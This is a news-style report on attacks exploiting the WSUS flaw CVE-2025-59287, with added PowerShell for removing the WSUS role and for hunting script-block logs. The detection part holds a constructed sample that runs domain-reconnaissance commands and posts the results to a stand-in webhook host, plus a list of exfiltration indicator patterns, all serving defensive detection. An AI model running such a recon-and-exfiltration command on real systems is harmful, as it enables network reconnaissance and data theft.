Exploiting the Critical WSUS Vulnerability: Windows Server under Attack

A critical-severity vulnerability in Windows Server Update Services (WSUS) is now being exploited by attackers, and proof-of-concept exploit code is already circulating publicly.

Tracked as CVE-2025-59287, this remote code execution (RCE) flaw affects only Windows servers that have the WSUS Server role enabled. That role, which is not enabled by default, lets a server act as an update source for other WSUS servers in the organization.

Threat actors can leverage this vulnerability in low-complexity remote attacks that do not require privileges or user interaction, enabling them to execute malicious code with SYSTEM privileges. In certain conditions, the security flaw could potentially facilitate wormable behavior between WSUS servers.

Microsoft released out-of-band security updates for all affected Windows Server versions to address CVE-2025-59287. Administrators are strongly advised to install them without delay.

For those unable to immediately deploy the emergency patches, Microsoft has also provided workarounds, such as disabling the WSUS Server role on vulnerable systems to eliminate the attack vector.
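The workaround above amounts to checking whether a host actually carries the WSUS Server role and, if it does, removing it. The following is an added example, not Microsoft's or the article's own code: it reports the role state and any listener on the default WSUS ports (8530/8531), and only removes the role when explicitly told to. It assumes an elevated PowerShell session on Windows Server with the ServerManager module available.

```powershell
# Added example (not from the advisory or the article). Run elevated on the
# server being checked. Get-WindowsFeature / Uninstall-WindowsFeature come
# from the ServerManager module, which only exists on Windows Server.

function Get-WsusExposure {
    # Role state as Server Manager sees it.
    $feature = Get-WindowsFeature -Name UpdateServices

    # Anything listening on the default WSUS HTTP/HTTPS ports (8530/8531).
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $_.LocalPort -in 8530, 8531 }

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        RoleInstalled  = [bool]$feature.Installed
        ListeningPorts = @($listeners | Select-Object -ExpandProperty LocalPort -Unique)
    }
}

function Invoke-WsusWorkaround {
    # Removes the WSUS Server role (the advisory's workaround). Without -Apply
    # it only previews the change, because removal stops update distribution
    # from this host and must be planned for.
    param([switch]$Apply)

    $state = Get-WsusExposure
    if (-not $state.RoleInstalled) {
        Write-Host "WSUS Server role is not installed on $($state.ComputerName); nothing to do."
        return $state
    }

    if ($state.ListeningPorts.Count -gt 0) {
        Write-Warning ("WSUS ports listening: {0}. Confirm these are not reachable from the internet." -f ($state.ListeningPorts -join ', '))
    }

    if ($Apply) {
        Uninstall-WindowsFeature -Name UpdateServices -Restart:$false
    } else {
        Uninstall-WindowsFeature -Name UpdateServices -WhatIf
    }
    return $state
}

# Preview first; re-run with -Apply once the change is approved.
Invoke-WsusWorkaround
```

Removing the role is a service-affecting change; on a server that other WSUS servers or clients pull updates from, apply the out-of-band patch instead and keep the role in place.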

Cybersecurity firm HawkTrace Security has also published proof-of-concept exploit code for CVE-2025-59287, although that PoC does not achieve arbitrary command execution.

Exploitation in the Wild

Eye Security, a Dutch cybersecurity firm, reported instances of scanning and exploitation attempts related to this vulnerability. Additionally, they confirmed that at least one of their customers’ systems had been compromised using a distinct exploit from the one shared by HawkTrace.

Although WSUS servers are not normally exposed to the internet, Eye Security identified approximately 2,500 internet-reachable instances worldwide, including 250 in Germany and around 100 in the Netherlands.

Huntress, an American cybersecurity company, has also observed attacks since October 23 against WSUS instances whose default ports (8530/TCP and 8531/TCP) are exposed to the internet.


“We anticipate limited exploitation of CVE-2025-59287, as WSUS servers rarely expose ports 8530 and 8531. Across our partner base, we have identified approximately 25 vulnerable hosts,” Huntress stated.

In the observed attacks, the threat actors ran a PowerShell command that performed internal Windows domain reconnaissance and sent the results to a webhook. The collected data included the output of commands such as 'whoami', 'net user /domain', and 'ipconfig /all'.
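Those three commands in one script block, followed by an outbound POST, are a cheap hunting signal. The following is an added example, not Huntress's or the article's detection logic: it scores PowerShell script-block text for the reconnaissance commands named above plus a web-exfiltration call, runs over two constructed samples, and then applies the same check to Event ID 4104 in the PowerShell Operational log. The exfiltration indicators (Invoke-WebRequest, Invoke-RestMethod, "webhook", UploadString) are assumptions about how such a command might be written, not strings taken from the observed attacks; the live query requires Script Block Logging to be enabled.

```powershell
# Added example (not the article's or Huntress's code). Sample script blocks
# below are constructed for the demonstration.

$ReconCommands = @('whoami', 'net user /domain', 'ipconfig /all')   # from the article
$ExfilPatterns = @('Invoke-WebRequest', 'Invoke-RestMethod', 'webhook', 'UploadString')  # assumed

function Test-ReconScriptBlock {
    # Returns which recon commands and exfil indicators appear in a script
    # block. Suspicious = at least two recon commands plus one exfil indicator,
    # which separates the observed pattern from an admin running ipconfig once.
    param([Parameter(Mandatory)][string]$Text)

    $recon = @($ReconCommands | Where-Object { $Text -match [regex]::Escape($_) })
    $exfil = @($ExfilPatterns | Where-Object { $Text -match [regex]::Escape($_) })

    [pscustomobject]@{
        ReconHits  = $recon
        ExfilHits  = $exfil
        Suspicious = ($recon.Count -ge 2 -and $exfil.Count -ge 1)
    }
}

# Constructed samples: one resembling the described recon-and-exfil command,
# one benign admin one-liner.
$samples = [ordered]@{
    'attacker-like' = '$o = whoami; $o += net user /domain; $o += ipconfig /all; Invoke-RestMethod -Uri "https://webhook.example/abc" -Method Post -Body ($o -join "`n")'
    'admin-like'    = 'ipconfig /all | Out-File C:\temp\net.txt'
}

foreach ($name in $samples.Keys) {
    $r = Test-ReconScriptBlock -Text $samples[$name]
    '{0}: suspicious={1} recon=[{2}] exfil=[{3}]' -f $name, $r.Suspicious,
        ($r.ReconHits -join '; '), ($r.ExfilHits -join '; ')
}
# attacker-like: suspicious=True  recon=[whoami; net user /domain; ipconfig /all] exfil=[Invoke-RestMethod; webhook]
# admin-like:    suspicious=False recon=[ipconfig /all] exfil=[]

# Live hunt over the last 7 days of script-block logs. Properties[2] of a
# 4104 event is ScriptBlockText.
try {
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddDays(-7) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction Stop | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $r = Test-ReconScriptBlock -Text $text
        if ($r.Suspicious) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Recon       = ($r.ReconHits -join '; ')
                Exfil       = ($r.ExfilHits -join '; ')
                ScriptBlock = $text
            }
        }
    }
} catch {
    Write-Warning "Could not read the PowerShell Operational log: $_"
}
```

Long script blocks are split across several 4104 events; join fragments by ScriptBlockId (Properties[3]) before scoring if the command you are hunting for is larger than a one-liner.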

The Netherlands National Cyber Security Centre (NCSC-NL) corroborated these findings and highlighted the heightened risk due to the availability of a PoC exploit for CVE-2025-59287.

“The NCSC has been informed by a trusted partner about exploitation of vulnerability CVE-2025-59287 on October 24, 2025,” the NCSC-NL cautioned in a Friday advisory.

Microsoft has categorized CVE-2025-59287 as “Exploitation More Likely,” indicating its attractiveness to attackers. However, the company has not yet confirmed active exploitation in an updated advisory.

Update October 24, 13:51 EDT: Additional details on active exploitation from Huntress Labs have been included.
